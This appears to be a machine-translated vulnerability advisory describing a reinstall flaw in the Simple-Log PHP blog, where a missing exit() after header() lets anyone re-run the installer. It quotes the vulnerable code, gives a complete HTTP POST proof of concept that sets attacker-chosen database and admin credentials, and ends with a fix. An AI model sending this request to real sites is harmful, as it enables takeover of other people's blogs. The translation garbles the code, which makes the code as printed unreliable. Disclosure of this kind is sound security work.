The Simple-Log Blog system is a blog system built in PHP + MySQL. If the install directory is not deleted, attackers can reinstall it.
If the install Folder is not deleted, install/index. in php, users can submit remote mysql accounts and passwords, causing simple-log to be re-installed. Because the header () function does not end with the code, this vulnerability occurs.
In/install/index. php
$ Setup =! Empty ($ _ POST ['setup'])? $ _ POST ['setup']: 'check ';
If (file_exists (PBBLOG_ROOT. 'Home/data/config. php '))
{
Require_once (PBBLOG_ROOT. 'Home/data/config. php ');
}
// You only need to submit setup = finish in post mode to enter the installation process.
If ($ install_lock & $ setup! = 'Finish ')
{
// The header does not end with the Code. The vulnerability exists here.
Header ('location: ../index. php ');
}
.........
.........
Elseif ($ setup = 'finish ')
{
$ Error = array ();
If (empty ($ _ POST ['host'])
{
$ Error [] = 'Enter the database address ';
}
If (empty ($ _ POST ['dbname'])
{
$ Error [] = 'Enter the database ';
}
If (empty ($ _ POST ['dbuser'])
{
$ Error [] = 'Enter the database username ';
}
If (empty ($ _ POST ['admin _ user'])
{
$ Error [] = 'Enter the Administrator account ';
}
If (empty ($ _ POST ['admin _ pass'])
{
$ Error [] = 'Enter the Administrator password ';
}
If (empty ($ _ POST ['blogname'])
{
$ Error [] = 'Enter the blog name ';
}
If ($ error)
{
Echo '<p class = "line"> error message </p> ';
Foreach ($ error as $ val)
{
Echo "<p> $ val </p> ";
}
Exit;
}
// Enter the connection information of your mysql database.
$ Dbhost = $ _ POST ['host'];
$ Dbuser = $ _ POST ['dbuser'];
$ Dbpw = $ _ POST ['dbpass'];
$ Dbname = $ _ POST ['dbname'];
$ Charset = 'utf8 ';
$ Db = new cls_mysql ();
If ($ db-> connect ($ dbhost, $ dbuser, $ dbpw, $ dbname, $ charset, $ pconnect ))
{
$ Error [] = 'database connection error ';
}
If (empty ($ _ POST ['dbprefix'])
{
$ Dbprefix = 'fb _';
}
Else
{
$ Dbprefix = $ _ POST ['dbprefix'];
}
// The submitted admin_user and admin_pass will eventually become the web administrator's account and password
$ Admin_user = $ _ POST ['admin _ user'];
$ Admin_pass = $ _ POST ['admin _ pass'];
$ Blogname = $ _ POST ['blogname'];
$ Blogdesc = $ _ POST ['blogdesc'];
$ Blog_keyword =$ _ POST ['blogkeyword'];
// Write the configuration file and update the database. Then, the simple-log database will use the database submitted by the user.
PoC:
POST http://www.2cto.com/install/index. php HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; U; Edition IBIS; zh-cn) Presto/2.10.229 Version/11.64
Host: www.xxx.com
Accept: text/html, application/xml; q = 0.9, application/xhtml + xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*; q = 0.1
Accept-Language: zh-CN, zh; q = 0.9, en; q = 0.8
Accept-Encoding: gzip, deflate
Referer: http: // xxx/install/index. php
Proxy-Connection: Keep-Alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Setup = finish & host = mysql address & dbname = Database Name & dbuser = Account & dbpass = PASSWORD & admin_user = Administrator Account & admin_pass = administrator password & blogname = blog name
ScreenClip.png
Solution:
Add exit () after header ()
If ($ install_lock & $ setup! = 'Finish ')
{
Header ('location: ../index. php ');
Exit ();
}